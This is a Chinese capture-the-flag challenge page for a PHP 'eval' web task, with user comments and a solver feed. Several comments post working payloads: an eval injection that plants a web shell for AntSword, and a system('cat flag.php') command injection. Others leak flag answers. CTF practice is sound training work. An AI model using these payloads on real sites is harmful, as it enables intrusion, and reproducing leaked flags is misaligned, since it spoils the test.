evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18155
提  示:
描  述:
eval
评论
星空 1年前

?hello=eval($_POST["cmd"])然后用蚁剑连,密码cmd

回复 0

springCloud 1年前

?hello=new Exception(system('cat flag.php'))

回复 0

小白帽来挖个漏洞 1年前

https://blog.csdn.net/guanrongl/article/details/142799641

回复 1

czhf20120704 1年前

flag{af99d77f1a8c71a69e7580a441f9c641};

回复 0

翻斗花园牛爷爷 1年前

flag{0c78799e8e21e8c1154621869960e3bf}

回复 0

turriT0Psis 1年前

怎么我开启的环境和评论区好像不太一样,我里面是上传一个.jpg/.png后缀的文件,自动被当做python运行结果回显在页面注释里。很简单,但是获取到flag提交是错的

回复 0

fairytale0717 1年前

flag{0c78799e8e21e8c1154621869960e3bf}

回复 0

XmN<=GzR 1年前

flag{b95f883f8d6d2a1096aad77516c046c3}

回复 0

endual 1年前

根据网页提示,hello作为参数提交 浏览器输入http://114.67.175.224:17573/?hello=hello,bp抓包 根据网友提示,对抓包url地址修改

回复 0

Eureka0bugku 1年前

flag{c6fcc6b437746842cc242259281f9fc4}

回复 1

WriteUp

image
harry

1 金币

评分(10)

解题动态

Niko_83c 攻破了该题 59分钟前
542698 攻破了该题 1小时前
slsdy 攻破了该题 4小时前
IamnotLin 攻破了该题 12小时前
zzZxby 攻破了该题 15小时前
yyc4088 攻破了该题 16小时前
xhonggcc 攻破了该题 19小时前
570570 攻破了该题 20小时前
lilym 攻破了该题 20小时前
color111111 攻破了该题 1天前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 2天前
19941759966 攻破了该题 2天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
1293273679 攻破了该题 2天前
问题反馈